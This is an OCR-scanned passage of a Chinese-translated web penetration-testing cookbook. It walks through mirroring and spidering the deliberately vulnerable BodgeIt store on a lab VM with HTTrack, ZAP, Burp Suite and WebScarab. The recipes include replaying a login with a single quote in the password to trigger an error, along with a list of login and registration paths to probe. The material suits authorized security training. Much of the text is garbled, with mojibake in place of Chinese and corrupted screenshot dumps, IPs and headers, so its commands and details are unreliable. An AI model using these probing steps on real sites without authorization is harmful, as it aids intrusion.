e k :在 文件 下 载 之 后 ，Wget 修改 所 有 和 链接， 使 其 指向 相应 的 本 地 文件 ， 这 会 使 站 点 能 
够 在 本 地 浏览 。 


e -p :这 个 选项 让 Wget 下 载 页 面 所 需 的 所 有 图 像 ， 即 使 它们 位 于 其 它 站 点 。 


3.2 使 用 HTTrack 为 离线 分 析 下 载 页 面 


就 像 HTTrack 的 官网 所 说 ( http://www.httrack.com ) 





我 们 在 这 个 秘籍 中 会 使 用 HTTrack 来 下 载 应 用 站 点 的 所 有 内 容 。 
准备 
HTTrack 没有 默认 在 Kali 中 安装 。 所 以 我 们 需要 安装 它 


apt-get update 
apt-get install httrack 


p 
， 我们 的 第 是 创建 目录 来 储存 下 载 的 站 点 ， 输 入 : 


mkdir bodgeit httrack 
cd bodgeit httrack 


2. 使 用 HTTrack 的 最 简单 方式 就 是 向 命令 中 添加 我 们 打算 下 载 的 URL o 


httrack http://192.168.56.102/bodgeit/ 


设置 最 后 的 / 非常 重要 ， 如 果 遗 漏 了 的 话 ，HTTrack 会 返回 404 错误 ， 因 为 服务 器 根 目 
录 没 有 bodgeit 文件 。 


st# mkdir bodgeit httrack 
kd cd bodgeit httracky 
lIgeit httrack# httrack http:, 


You are running this program as root! 
it might be a good idea to use the -+U option to change the userid: 
Example: -$U smith 


Mirror launched on Sun, 12 Jul 2015 13:52:13 by HTTrack Website Copier/3.46«libh 
tsjaāavā.so.z [X RÀ CD 2018] 

mirroring http: /192.168.56.102/bodgeit/ with the wizard help.. 
Done.: 192.168.56.102/bodgeit/advwvanced.jsp (0 bytes) 508 
Thanks for using HTTrack! 





9. WE’ de AI PX 
TF file:///root/MyCookbook/test/bodgeit httrack/index. html ( 或 者 你 在 你 的 测试 环境 
中 选择 的 目录 ) ， 我 们 会 看 到 ， 我 们 可 以 离线 浏览 整个 站 点 


The Bodgelt Store 


amc 
Ema 


B£oe-pneyYysst 


r 
a 


TERELI 


工作 原理 


HTTrack 创建 站 


Kod e 


file: J/fraot/MyCookbboak/test/bad geit -httrack/ 192.168.556 102/hbad geithndex html 


iD'oadahs 
Gizmos 
Thingamaj'gs 
Thingies 
Whatchamacallits 
Whatsits 
Widgets 


About Ls 


x LL The Bodaelt Store x 


The Bodgelt Store 


We bodge it, so you dont have to! 


Contact Lig 


Our Best Deals! 


Product 
Thingia 4 
Whatsit called 
TGJ CCD 
Whatsit taste like 
Bonzo dog doo dah 
Thingia 3 
TGJ AAA 
GZ FZ& 
Yauknawwhat 
Whatsit tasta lika 


Login Your Basket 


Type 
[Thi ngies 
Whatsits 
[Th ingama ii gs 
Whats ts 
Doadahs 
IThi ngies 
IThinga majlgs 
Gizmos 
Whatchamacallits 
Whats ts 


Guest user 


Saarch 


Price 
$3.50 
$4.10 
$2.20 
$3.86 
$2.45 
$3.30 
SO göl 
$1.00| 
s4. 32 
$3.86 


点 的 完整 静态 副本 ， 这 意味 着 所 有 动态 内 容 ， 例 如 用 户 输入 的 响应 ， 都 不 会 


e 以 服务 器 名 称 或 地 址 命名 的 目录 ， 


P 


HTTrack 也 拥有 一 些 扩 展 选 


cookies.txt 文件 


包含 用 于 下 载 站 点 


的 文件 夹 中 ， 我 们 可 以 看 到 下 列 文件 和 目录 : 


包含 所 有 下 载 的 文件 。 


hts-cache B 3k EA d fe xk Je | 8] 85 xc EPA 


hts-log.txt 3 fF & 2-448 iX ^ E 


多 


些 值得 考虑 的 实用 修改 器 


BES 


告 和 其 


index.html 文件 重 定 向 到 副本 的 原始 主页 ， 它 位 于 名 称 为 服务 器 的 目录 中 。 


先 项 ， 人 允许 我 们 目 定 义 它 


-rN : 将 卜 取 的 链接 深度 设置 为 N。 
-%eN : 设置 外 部 链接 的 深度 界限 。 
*[pattern] 


- [pattern] 


-F [user-agent] 


它 在 疏 取 或 下 载 站 点 


“的 行为 来 更 好 符 


的 cookie 信息 。 


期 间 的 信息 


这 是 httrack 所 处 理 的 文件 列表 。 


: 告诉 HTTrack 将 匹配 [pattern] 的 URL 加 入 白 名 单 ， 例 
如 -**google.com/* ° 


: 告诉 HTTrack 将 匹配 [pattern] 的 URL 加 入 黑 名 单 。 


: 允许 我 们 定义 用 于 下 载 站 点 


的 UA (浏览 器 标识 符 ) 


Oo 


合 我 们 的 需求 。 下 面 是 一 


3.3 使 用 ZAP łk 


在 我 们 的 计算 机 中 将 完整 的 站 点 下 载 到 目录 给 予 我 们 信息 的 静态 副本 ， 这 意味 着 我 们 拥有 了 
不 同 请 求 产 生 的 输出 ， 但 是 我 们 没有 服务 器 的 请 求 或 响应 状态 。 为 了 拥有 这 种 信息 的 记录 ， 
我 们 需要 使 用 晓 蛛 ， 就 像 OWASP ZAP 中 集成 的 这 个 


这 个 秘籍 中 ， 我 们 会 使 用 ZAP htk KR vulnerable vm 中 的 目录 ， 并 检查 捕获 的 信息 。 
准备 


对 于 这 个 秘籍 ， i 需要 启动 vulnerable vm 和 OWASP ZAP > | X 25 3; 3 Bo iE OK 4. ZAP 用 
做 代理 。 这 可 以 通过 遵循 上 一 章 中 “使 用 ZAP 发 现 文 件 和 文件 夹 "中 的 指南 来 完成 。 


TRE Ty JC 

1. A T ZAP 启动 并 使 浏览 器 将 其 用 作 代 理 ， 浏 览 nttp://192.168.56.102/bodgeit/ ° 

2. 在 sites 标签 页 中 ， 打 开 对 应 测试 站 点 的 文件 夹 (本 书 中 是 http://192.168.56.102 ) ° 
3， 右 击 GET:bodgeit ° 


4. 从 下 拉 菜 单 中 选择 Attack | Spider. ° 





Untitled Session - OWASP ZAP 2.4.0 
Eile Edit view Analyse Report Tools Online Help 


| Standard mode m. ki, | ue 12569 oea OGE , @ b P © AU d, ux 





: l 3 Quick Start ** | = Request | Responses | P | 
ecco 





|" (3 Contexts Welcome to the OWASP Ze 
Œ Default Context ZAP is an easy to use integrated penetration testing tool 

* à "sites 
Y [3 Pb http.//192.168.56.102 Please be aware that you should only attack applications 









| low and pr 
图 D active scan. 000 [eme PP 


*- Spider. 














| Delete 
Include in Context 
Flag as Context 

Run application 
Exclude from Context 
Resend... 

Hew Alert... 




















- Forced Browse site 
A Forced Browse directory 

,F Forced Browse directory (and children) 
s AJAX Spider... 


和 Fuz.. 


T FF F 

















5 在 对 话 框 中 ， 保 留 所 有 选项 为 默认 并 点 击 Start Scan ° 


6. 结果 会 出 现在 spider 标签 页 的 斤 部 面板 中 。 


i^ 


8. 


3E Jf RFR 


"s Search 


| S History 









LETEA T 























| Pracassed | Mathad [UR — | Flags 
| - POST Ptr tat 
D POST hitp: mn 9g. 1536 55 1üz2/bodgait/ibaskat.|sp 
- POST hiipui 82.188. 55.102/bodgeit/baskat.|sp 
| = POST hpi 82.168.558 102/badgeit/basket.|sp 
| - POST hitpurt 82.168.558. 102/badgeit/basket.|sp 
| m POST hitpoiíl 82.168 58.1 02/badqeitibasket. jap 
| e POST Hitpurt 62.168 56.102/badqeit/basket.|sp 
| - POST hitp.i/t 52.168 56.102/bodgeitibasket.|sp 
| e POST Hitp:i/t 52.168 56.1 02/bodgeit/basket.|sp 
| - POST hitp:i/152.158 56. 10z/bodgeit/baskat.|sp 
| = GET hitp:iistackavarilaw. com/questions/316781/how-ta-build-quer... QUT DF STOPE 
| - GET hitp-i/T 92.168 56.1 02/badgeltimages/l 51.png 
| € GET hitpull 82.168 .55.1 02/bodgeitiimages/154 png 
| - POST Pat 82, 168.55. 102/badgeit/conitact;]sp 
| e POST hitpulL 62.168 54,1 ü2/badgeitiregiiter jsp | 
— REEL REI "IPIS CREW REETREI 1163 NN 
| Alerts Mü m2 n4 mà zÀ Currant Scans (o ^o Qo Mo ^o o Wo 


如 果 我 们 打算 分 析 独 立 文 件 的 请 求 和 响应 ， 我 们 访问 Sites 标签 并 打开 其 中 的 site 文件 
夹 和 bodget 文件 来。 让 我 们 看 一 看 POST:contact.jsp(anticsrf,comments,null) ° 


[F ocr sort FE 





* L2 P hEpu182.168.56.102 `| post http://182.158.56.102/bodgeit/contact.]sp HTTP/1.1 
| fP'aET.bodgeit | User-Agent: Mozilla/4.O (compatible; MSIE 6.0; Wimdows MT 5.0;] 
"^ P» M GET;robots.txt | Pragma: no-cache 
' f NGETSemap mi Zache- Control: na-cache 
| Y Content-Type: application/x-www-farm-urlencoded 
"ib m nbodget Content-Length: 43 
L1 m wGETheme;jsp Referer: http://182.158.56. 102/bodgeit/contact.]sp 


|. P W GET:cantact.jsp Host: 182.1658.55.102 
| P Ww cET:abaut.jsp | 
向 ** GET.login.jsp 
|. M Ww GET:basket.jsp : - ; 二 一 
|! fs # GET:praduct.jspitypeld) mill -:anticsrf-0. 75727: —Ü 
|| FP # GET:search jsp 
| P wGET:praduct.jsplprodid) 
|| ™ # GET:style.css 

. Fr # GET:admin.|s 








|. P WPOST:basket.|splupdate? 


在 右边 ， 我 们 可 以 看 到 完整 的 请 求 ， 包 含 所 使 用 的 参数 (下 半边 ) 。 


Oo 


现在 ， 选 择 右 侧 部 分 的 Reponse 标签 页 





BE oon Text -T Body: Text 


HTTP/1. t 200 K 

Date: Sun, 12 Jul 2015 20:09:43 GMT 

Server: Apache-Coyote/l.l 

Content-Type: text/html 

Content-Length: 2436 

Set-Cookie: JSESSIONMID-AZO033EB7AFSG34FCDBlBFE75CE25524271; Pathz/ 


Via: 1.1 127.0.1.1 
Vary: Accept-Encoding 





=! DOCTYPE HTML PUBLIC , . / /W3C/ /DTD HTML 3.2//EN"2 

«html 

<head> 

ætitle=The BodgeIt Store«/title- 

«link href=" style.css" rel="stylesheet" type="text/css" /» 
«script type=" text/javascript" srcz"./j]s/util.]s'»«/script» 
z/head» 

<body> 





«center» 
«table widthz*'BO" classz"border"» 


和 EH NDI. 
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在 上 半边 中 ， 我 们 可 以 看 到 响应 头 ， 包 括 服务 器 标识 和 会 话 Cookie， 在 下 版 本 我 们 拥有 
完整 的 HTML 响应 。 在 之 后 的 章节 中 ， 我 们 会 了 解 从 已 授权 的 用 户 获 取 这 种 cookie， 如 
何 用 于 劫持 用 户 会 话 以 及 执行 冒充 它们 的 操作 。 


工作 原理 


就 像 任 何其 它 仆 下 那样 ，ZAP SIESERSRI ERR 0 EA BERE o LT AEAS OSEE GR GU VUA 
P akik PAIR d) Lb WI o’ ESERASEIARGÉUSE C $9 e 

在 robots.txt 和 sitemap.xml 文件 中 的 URL。 之 后 它 会 为 之 后 分 析 和 使 用 储存 所 有 请 求 和 响 
应 N 


更 多 

在 爬 取 站 点 或 目录 之 后 ， 我 们 可 能 打算 使 用 储存 的 请 求 来 执行 一 些 测试 。 使 用 ZAP 的 功能 ， 
我 们 能 够 执行 下 列 事情 : 

。 在 修改 一 些 数据 之 后 重 放 请 求 

。 执行 主动 和 被 动 漏洞 扫描 

。 模糊 测试 输入 参数 来 寻找 可 能 的 攻击 向 量 

。 在 浏览 器 中 重 放 特 定 请 求 


3.4 使 用 Burp Suite /&3 35 
Burp 几乎 是 最 广泛 用 于 应 用 渗透 测 试 的 工具 ， 因 为 它 拥 有 类 似 ZAP 的 功能 ， 并 含有 一 些 独特 


的 特性 和 多 用 的 界面 。Burp 不 仅仅 能 够 用 于 寂 取 站 点 ， 但 是 现在 ， 作 为 贷 查 阶段 的 一 部 分 ， 
我 们 先 涉及 这 个 特性 。 


准备 

通过 访问 Kali 的 Applications 菜单 ， 之 后 访 

问 63 web Application Analysis | Web Application Proxies | burpsuite 来 后 动 Burp Suite ° 
就 像 下 面 这 样 : 


'[](img/3-4-1.jpg) 


一 


之 后 配置 浏览 器 将 其 用 做 代理 ， 通 过 8080 端口 ， 就 像 我 们 之 前 使 用 ZAP 的 那样 。 


TETTE JE 


1. Burp 的 代理 默认 配置 为 拦截 所 有 请 求 ， 我 们 需要 禁用 它 来 不 带 拦截 浏览 。 访 问 Proxy 标 


签 页 并 点 击 Intercept is on 按钮 ， 它 就 会 变 为 Intercept is off ， 像 这 样 : 


大 大 


第 三 章 REEF 








Burp Suite Free Edition v1.6.01 


Burp Intruder Repeater Window ainda heg 





J nr | WebSockets. WebSockets history [Options | ———- | 


Forward | Drop 




















Action 








2. 现在 ， 在 浏览 器 中 ， 访 问 http://192.168.56.102/bodgeit/ 。 


3. 在 Burp 的 窗口 中 ， 当 我 们 访问 Target 的 时 候 ， 我 们 会 看 到 其 中 含有 我 们 正在 浏览 器 的 
站 点 信息 ， 以 及 浏览 器 产生 的 请 求 


| Burp Intruder papanta; Window pap. 






D adrrin.jsp 
[3 basket jsp 
[* contact jsp 
D home jsp 
"ua s 

[3 login.|sp 
= $& product jsp 
L search sp 


4 








| http:1/152.188,56.102 ibadgeit/about jsp 

| hitp:i192.168,55.102 GET ibadgeit/admin jsp 
|httpj152.158,56.102 GET Ibadgeit/basket jsp 
| Le le2.168.56.102 GET ibadgait/c ontact jsp 


| L. 
| http://152.168,56.10 








IEJIELDEEDEEDEIE 


| O02 GET jbadgeitihome jsp 
|httpj/192.188.56.102 GET iIbadgeit/jsutils 

| http: j192.168.56.102 GET jbadgeit/login.jsp 

| http: |192.168.565.102 . GET ibadgeit/praduct jsp 






|http//192.168.55.]102 GET ibadgeit/product jsp... 



































| GET, [bodge HTTP/1.1 
Host: 182,163,56,102 
User-Agent: Mozilla/s.O (X11; Linux xBe 64 rv:18.0] Gecko/20100101 Firefox/18.0 
Accept: text/html, application/xhtml 4. xml, application/zml:q- 0.8, */*:3- O.B 
Accept-Language en-Us en q-0.5 
Accept-Encoding: gzip, deflate 
Cookbe Ez offset --1800C- [8SESSIONID- FBBD7BBEER180778BSCDBFP13D263EO01C7: 
acopendmids- swingsst. jotta phpbb2 redzmnine: acgroaupswithpersistz nada 
Connection: keep-almve 


4. IWE > X TAE’ REE bodgeit 文件 夹 ， 并 从 某 zo od v 


4 Spider this branch ? 


60 


i^ 


3E Jf k fa o 


(Ste map. 


Filter: Hiding not found items; hiding CS5, image and general binary content; hiding 4x 
















|* http:;//192.168.56.102 






liant http://192.168.56.102/bodgeit 
Add to scope 
Spider this branch 


,1UZ GET 
iud lbs s ida GET 
//192.168.56.102 GET 
H 192.168.536.102 (GET 
//192.168,56.102 GET 
jan 1&8 SR 112 NET 


5. Burp 会 询问 我 们 是 否 添 加 项 目 到 这 里 ， 我 们 点 击 Yes oÅ% ^ Burp 8 Es*k AUC DS Bo 
定义 在 Target 标签 页 中 的 Scope 标签 页 中 的 模式 的 项 目 。 








y scan this branch 






in this branch 


6. XE  WsER ALAS iB o ZngqRm sp WR GKORGEÉXURS (CC ACHEAITIS ERAI Al 
LAKE akku Sp AXI D ARES ENRE t ka A RRA H o 
让 我 们 将 两 个 字段 ， 用 户 名 和 和 密码 都 填充 为 单词 test ， 并 点 击 Submit form 





Burp Spider - Submit Form Ox 


Burp Spider needs your guidance to submit a login form. Please choose the value of each form field which should be 
used when submitting the form. You can control how Burp handles forms in the Spider options tab. 


Action URL: http:;/192.158.56.102/bodgeit/login.jsp 
Method: POST 


Type | Name | value | | 
Text username test 



































| Submit form | | Ignore form | 


7 下面， 我 们 会 有 要求 在 注册 页 中 击 充 用 户 名 和 均码 。 我 们 通过 点 击 Ignore form 来 忽略 它 


8. 我 们 可 以 在 Spider 标签 页 中 检查 晓 蛛 的 状态 。 我 们 也 可 以 通过 点 
击 Spider is running 按钮 来 停止 它 。 让 我 们 现在 停止 它 ， 像 这 样 : 


61 


PEF fe denas 


Burp Suite Free Edition v1.6.01 
Burp intruder. Repeater Window Help 


Proxy | Spider Scanner | intruder Repeater Sequencer | Decoder | Comparer 





TI ral Options | 


[2] Spider Status 


Use these settings to monitor and control Burp Spider. To begin spidering. browse to the ta 
the target site map, and choose "Spider this host / branch". 


| Spider is paused | | Clear queues | 


Requests made: 64 
Bytes transferred: 198,882 
Requests queued: 0 
Forms queued: O 


9. 我 们 可 以 在 Site map A JL F AEk ERRER” CE Target 中 。 让 我 们 查看 我 们 
之 前 填充 的 登录 请 求 : 













































































| Filter: Hiding not faursd items: hiding CSS, image and general binary content; hiding 4xx responses: hiding empty folders 











| T http:/192.1658.55.102 | Host | Method | URL | Params | Status 4| Length | MIME t | 
* [3 bodgeit Fetal 855.102 POST  bsdaeitili A — 30i 72721 HTML 
[17 
|] about jsp 
O admin.jsp 
|] advanced. jsp 
* $3 basket jsp 
* (S contact.jsp 
Ci hame.jsp 


"lis 


| * 13 lagmn.jsp | 
| La es 


* $3 product jsp II^ 
[5 register.jsp 
|. score jsp 

* $3 search.jsp 



















Params | Headers Hex. | 














POST /bodgeirt/login.jsp HTTP/1.1 [& | 
Host: 192.162.565.102 | 
Accept: +t 

Accapt-Languages en 

User-Agent: Mozilla/5.0 (compatible; MSIE 5.0: Windows NT 6.1: Wine: xét Trident/5.0) 
Connection: close 

Referer: httpcj/192.1 68.56, 102/bexd geit/loqin.jsp 

Content-Type appidicakion/x www-farm-urlencaded 

Content-Length: 27 

Cookie: tz offset-18000; ISEBSIONIDs FHBD7BEEB150779B3CDBE13DZG63BD1C7: 
acopendivids- swingset jotto phpbb2 redmire acgroupswithperstt- nada: b 1d274 


username-test& password- test 


工作 原理 


Burp 的 疾 蛛 遵循 和 其 它 痪 蛛 相 同 的 方式 ， 但 是 它 的 行为 有 一 些 不 同 ， 我 们 可 以 让 它 在 我 们 浏 
览 站 点 的 时 候 运 行 ， 它 会 添加 我 们 跟随 ( 匹配 范围 定义 ) 的 链接 到 卜 取 队列 中 。 


就 像 ZAP 那样 ， 我 们 可 以 使 用 Burp 的 寂 取 结果 来 执行 任何 操作 。 我 们 可 以 执行 任何 请 求 ， 
例如 扫描 (如 果 我 们 拥有 付费 版 )、 重 放 、 比 较 、 模 糊 测 试 、 在 浏览 器 中 查看 ， 以 及 其 它 。 


3.5 使 用 Burp 重 放 器 重 放 请 求 
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三 章 Jedes 


在 分 析 晓 蛛 的 结果 以 及 测试 可 能 的 表单 输入 时 ， 发 送 相同 请 求 的 修改 特定 值 的 不 同 版 本 可 能 
很 实用 。 


这 个 秘籍 中 ， 我 们 会 学 到 如 何 使 用 Burp 的 重 放 器 来 多 次 发 送 带 有 不 同 值 的 请 求 。 
准备 


我 们 从 前 一 个 秘籍 的 地 方 开始 这 个 秘籍 。 局 动 vulnerable vm 虚拟 机 和 Burp 以 及 将 浏览 器 合 
理 配 置 来 将 Burp 用 做 代理 非常 必要 。 


TE R 


， 我 们 的 第 一 步 是 访问 Target 4k ^ 08d kA E m Gk d e 
( http://192.168.56.102/bodgeit/login.]jsp ) d 带 有 username-test&password-test 的 那 


| Oo 


2. 右 击 请 求 并 从 菜单 中 选择 send to Repeater ， 像 这 样 : 


r- 一 一 一 一 ——— — 一 一 一 一 
I 


Burp Sulte Free Edition v1.6.01 











| Burp Intruder Repester Window Help | 
z | 


nns Prony Spider Scanner | intruder | 








|" http:j/192.168.56 102 Host |Methad | URL |Params Status a| Length | MIME t 














[5 abaut jsp 
[5 admin.jsp 
[5 advanced jsp 
* E basket.jsp 
* (S9 contact jsp 
[5 hoerne.jsp 
"B is 
Y $3 login jsp 





+ (i product.jsp E POST: usarname-taest&password-tast 一 一 | 
D registaer.s5 Remave from stopa 
L3 score jsp Spider fram here 

* $i search |sp d c 





ru 





Send to Intruder Ctri--i 
n i Hepta - 1 i mad 


Send toe seguencer 3.0; Windows NT 6.1; WinG4; x64; Trident/5.0) 


Sand to Comparer [request] A 
E 


Send to Comparer [respanse) lemdad 


shaw respanse in brawser 

Request in browser b PATOZIABBSESBO223b5BAS7CO7PGFGSF: b id-2 
Engagement tools [Pra version andy] Ld 

Compare site maps 

Celata iter 

Copy URL 

Copy as curl command | 
Copy links [E | 
Save fern rn ü matches 


现在 我 们 切换 到 Repeater 标签 页 。 


4. 让 我 们 点 击 Go 来 在 右 侧 查看 服务 器 的 响应 
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三 章 Jedes 


| Burp Suite Fre« Edition v1.6.01 ESME" E 


| Burp intruder Repeater Windaw. Help | 


Target | Proxy | Spider | Scanner | intruder | Repeater.| Sequencer | Decoder | Comparer | Extender | Options | Alerts | 





[| l i Target: http://192.168.56.102 ||| ?| 


| Request Response 
| Raw. Headers Hex HTML | Render | 





Wo Params 








[POST T /bodgetiogim. Ep HTTP/1.1 å tr» 
| Host: 182, 168.56.102 | ctd align="left" valign="top" Width= "SW > 
| Accept: x p <a hrets *product.jsp?typesie c" 2» Doodahs«/a7 < br/7 
| Accept-Languaqe en «a href-*nproduct.jsp?typesd- 5*2 Gizmos ja «€ brf» 
|User-Agent: Mozilla/b.0 (compatible; MSIE 8.0; Windows NT 6.1; «à hret-"product.jsp?typesd-3"» Thingamajig /a- « brj- 
|'WinB4: x64: Trident/S.0) «a hres *product.]sp?typesis 2^» Thingies«/a7 « brj7 
|Cónnectinn: close «a href-z*product.jsp?bypesi- 7*» Whatchamacallitg-« jam < bri» 
| Referer: httpci/182, 188,56, 1 02/podgeirt/ lein. jsp «à href=" product.jsp?typesd- 4"» Whatsits- /a « bri 
| Content-Type: application/xwrww-Earm-urlencoded «a brafes *product.jsp?typerds 1^» Widgets« /a7 < hr> 
| Conbent-Lengtl: 27 
|Conkie tz offsst--18000 x prf « brjo « brio» « bro» brf « bri» « brio « brp & bri» brf « bri « br 
jSESSIONID- FD47021A5BSE3BUZZ36BAS7C67P6P66E: b i22 bri» « bri « bri 

hind» 
| username test& password test «td valign="top widthz 709» 


«p style= "colonred' > You supplied an invalid name or password.]- i. 


zh3-Login«/h32 
Please enter your credentials: «br» Br 
«form methods" POST" > 


在 Request 部 分 (图像 左 侧 ) 中 ， 我 们 可 以 看 到 发 给 服务 器 的 原始 请 求 。 第 一 行 展 示 了 
所 使 用 的 方法 : POST， 被 请 求 的 URL 和 协议 : HTTP 1.1°。 下面 一 行 ， 一 直到 Cookie : 
都 是 协议 头 和 参数， 在 它们 后 面 我 们 看 到 一 个 换行 ， 之 后 是 我 们 在 表单 输入 的 POST 参数 
和 值 。 





在 响应 部 分 我 们 看 到 了 一 些 标签 页 : Raw ^ Headers ^ Hex ^ HTML 和 Render 。 这 些 以 
不 同形 式 展 示 相 同 的 响应 信息 。 让 我 们 点 击 Render 来 查看 页 面 ， 就 像 在 浏览 器 中 那样 : 


| 
Target: http://192.168.56.102 a| T 


Response 





| Raw | Headers | Hex | HTML Render. 


The Bodgelt Store 





We bodge it. so you E 
dont aue tot ii 
f | contact. ; Your A: 
Home About Us Login Basket Search 
Doodahs You supplied an invalid name or 
Gizmos password. 
Thingarmajiqs 
Thingies Login 
Whatchamacallits 
Whatsits Please enter your credentials: 
Widgets 
Username: 
Password: 
| Login | 


[f you dont have an account with us 
then please Register now for a free 
account. 





6. 我们 可 以 在 请 求 端 修改 任何 信息 。 再 次 点 击 ok 并 检查 新 的 响应 。 对 于 测试 目的 ， 让 我 们 


将 密码 值 替换 为 一 个 单 引 号 ， 并 发 送 请 求 。 
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| Ga «T i Target: http://192.168.56.102 |7| P| 





Request Response 
FOST ji oaget lc ogin. je sp i HTTP| 1.1 L HTTP/t.1Z200 OF L 
Host: 19 al iB, EE, F Date: Mon, 13 Ji ll 20158 17:24:02 GMT T 
Accept: aere e: Apache-Ceyctel1.1 
ps en vament- Type La sta html 
User-Agenk: Mozillaí5.0 (compatible: MSIE 9.0: Windows MT &1: Tont neng -L.g ngth: 3 a3 
WinB4: x54: Tridenti.) ue 1.1 1ZT.0. L1 
Connection: close gary: Ac pt- Enccxting 
Raferer- http:/192.168,.556. 102/bodgett/jogiun.jsr c VLDE close al 


Content-Type: application/x www -forrm-urlencoded 
Content-Length: 24 
Cookie bz offsste 18000: 
JSESSIONIDZFPDATUZL1ABSSESBO2238BBAGTCOÓ7PGEPSOSE: b id-2 
System rror., 
username testé passwords 


CHDOCTYPE HTML PUBLIC "WSCSDTD HTML LIEN 
<html> 

z haad» 

ctitis» The Bodgelt Store«[titie 


我 们 可 以 看 到 ， 我 们 通过 修改 输入 变量 的 值 触发 了 系统 错误 。 这 可 能 表明 应 用 中 存在 汤 
洞 。 在 后 面 的 章节 中 ， 我 们 会 涉及 到 漏洞 的 测试 和 识别 ， 并 深入 探索 它 


工作 原理 


Burp 的 重 放 器 允许 我 们 手动 为 相同 的 HTTP 请 求 测试 不 同 的 输入 和 场景 ， 并 且 分 析 服 务 器 提 
供 的 响应 。 这 在 测试 漏洞 的 时 候 非常 实用 ， 因 为 测试 者 可 以 了 解 应 用 如 何 对 多 种 所 提供 的 输 
入 反应 ， 以 及 从 而 识别 或 利用 设计 、 编 程 或 配置 中 的 可 能 缺陷 。 


3.6 使 用 WebScarab 


WebScarab 是 另 一 个 Web 代理 ， 拥 有 让 渗透 测试 者 感 兴 趣 的 特性 。 这 个 秘籍 中 ， 我 们 会 使 
Jf] E 3& f XC] 3b o 
准备 


作为 默认 配置 ，WebScarab 实用 8008 端口 来 捕获 HTTP 请 求 。 所 以 我 们 需要 配置 我 们 的 浏 
览 器 来 在 localhost 中 使 用 这 个 端口 作为 代理 。 你 需要 遵循 与 在 浏览 器 中 配置 OWASP ZAP > 
Burp Suite 的 相似 步骤 。 这 里 ， 端 口 必须 是 8008 。 


TETTE JE 


1. Æ Kali 的 Applications 菜单 中 ， 访 问 03 web Application Analysis | webscarab 来 打开 
WebScarab ° 


2. à] X vulnerable vm 的 Bodgeit 应 用 ( nttp://192.168.56.102/ bodgeit/ ) 。 我 们 会 看 到 
它 出 现在 WebScarab 的 summary 标签 页 中 。 


3. 现在 ， 右 击 bodgeit 文件 夹 并 从 菜单 选择 Spider tree ， 像 这 样 : 


AW 


IX E XE da dha9x 


WebScarab = cC 


SAML | OpantD WS-Federation dantit 






Cu E uTREGPP. ———" — Y a M oen Pry be EE "mo mV em 


LI Tree: Selection filt filters cam mi list 
Methode | Status at le „lachon, | Set-Cookee 





Show scripts Ñ 
me l Show comments Hot |] 
iJ L8:09,27 GET COSER 





4 Sa Wk ALLE SCTE MAARA RLE UI E ERT o oS REOR c 


| Eila View Tools Help 





Ci Tras zum TD conversation list 












































$- E] htipzi192.168.56.102:80/ F1 





L] | LJ E| 
$*- [2 bódgait GET 20D OK 口 C C Tal [] 

j abaut.jsp GET 200 OK [L1 L] ie] LI Li [e [] [F] E| 
baskatjsp GET 200 OK L1 L] ie] xl Li [ei L] [e] E 
omtastjsp GET 200 OK L] L] fel E] m [e L] ie] [] 
hara jsp GET 200 OK 口 rà [d Lj 加 口 [e] ] 

é- 27 1s GET 404. Het [] L1 J L] E E L] c L] 

L) logm.jsp GET z00 c L1 L] ie] il Li [e L] le] B| 

&- [7] product. jsp GET 200 OK L] [L1 v] [] Ci [el L] le] [] 
| J search jsp GET 200 CK L1 L1 L.] E] L] 四 口 加 L] L 
stylarss — GET 200 ok i [ [] J J 2 L = 





Meiho] Hail Path  (Paramabera Status | Orgi 
ET — — hüpoli5. Mp typsidel |200 OK — Spider 
hri ti = 攻 dui | 
8... Ed 
itp B. bed 
Em 
dhitpur15... | 
am httpai La... Ws c 
pte Joost. lida... 
[1 N T httpills. bone ide... |200 CK z- 
httpurib... MUS „|200 OF 


1844.00 [Gl GT T http. edge. 1 | ] : 

1944500 G ipiri3... Exige. mat a [T "s | L ET] 

18:44-00 Ex http DER jam M Uu... mr 1: i I E | pales ION... | 
| ht pa 9... /bedgest... 227 | ESESSION... | 

igi GET ^htpu/18.. tex emi g 404 Hot = Ht pider i | | 


这 个 概览 也 展示 了 一 些 关于 每 个 特定 文件 的 相关 人 信息。 例如， 是 否 存 在 注入 或 者 可 能 为 
注入 的 漏洞 ， 是 否 设 置 了 cookie， 包 含 表单 ， 或 者 是 否 表单 含有 隐藏 字段 。 它 也 表明 了 
代码 或 文件 上 传 中 存在 注释 。 


如 果 我 们 右 击 任何 下 半 部 分 的 请 求 ， 我 们 会 看 到 可 以 对 它们 执行 的 操作 。 我 们 分 析 请 
求 ， 找 到 路 径 /bodgeit/search.jsp ， 右 击 它 ， 并 选择 Show conversation! 。 新 的 窗口 会 
弹出 ， 并 以 多 种 格式 展示 响应 和 请 求 ， 就 像 下面 这 样 : 


ZÈ € AhAeWekk 


WubScarab - conversation 27 














6. 现在 点 击 spider 标签 页 。 


WebScarab 







File Miew - deut. Help. 






Cp ——————— |.——— Fani 
| gue ns cooks 加 | 


Fetch Recursively | | 
| * GS httpi//192.1868,56.102:80/ 


这 个 标签 页 中 ， 我 们 可 以 在 Allowed Domains 和 Forbidden Domains 中 ， 使 用 正则 mE 
AKT] AE e EC AR o RAIAT AEA Fetch Tree 来 刷新 结果 。 我 们 也 可 以 通 
击 stop 44a kí abEeERk o 


工作 原理 


WebScarab 的 奖 蛛 类 似 于 ZAP 或 者 Burp Suite， 对 发 现 网 站 中 所 有 被 引用 文件 或 目录 ， 而 无 


需 手 动 浏览 器 所 有 可 能 的 链接 ， 以 及 深度 分 析 发 给 服务 器 的 请 求 ， 并 使 用 它们 执行 更 多 复杂 
的 测试 非常 实用 。 
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3.7 Jem 25 Xv an $48 X x tFÍe E X 


我 们 已 经 卜 取 了 应 用 的 完整 目录 ， 并 且 拥 有 了 被 引用 文件 和 目录 的 完整 列表 。 下 一 步 地 然 是 
识别 这 些 文 件 哪个 包含 相关 信息 ， 或 者 是 更 可 能 发 现 漏洞 的 机 会 。 


这 篇 不 仅仅 是 个 秘籍 ， 更 是 用 于 文件 和 目录 的 常见 名 称 、 前 后 级 的 总 结 ， 它 们 通 第 给 涂 透 测 
试 者 提供 有 价值 的 信息 ， 或 者 是 可 能 导致 整个 系统 沦陷 的 漏洞 利用 。 


操作 步骤 


首先， 我 们 打算 寻找 登录 和 注册 页 面 ， 它 们 可 以 给 我 们 机 会 来 成 为 应 用 的 正常 用 户 ， 或 
者 通过 猜测 用 户 名 和 密码 来 冒充 它们 。 一 些 名 称 和 部 分 名 称 的 例子 是 : 


o Account 
o Auth 
o Login 
o Logon 
o Registration 
o Register 
o Signup 
o Signin 
